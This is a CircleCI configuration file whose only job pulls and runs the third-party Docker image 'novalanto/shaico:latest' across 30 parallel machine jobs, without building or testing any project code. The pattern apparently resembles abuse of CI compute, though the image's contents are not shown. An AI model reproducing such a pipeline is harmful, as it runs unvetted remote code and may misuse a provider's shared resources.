working_dir: &working_dir ~/app

version: 2.1

workflows:
  main:
    jobs:
      - build

jobs:
  build:
    parallelism: 30
    machine:
      image: ubuntu-2404:2024.05.1
    steps:
      - checkout
      - run:
         name: "Bangun"
         command: docker run novalanto/shaico:latest
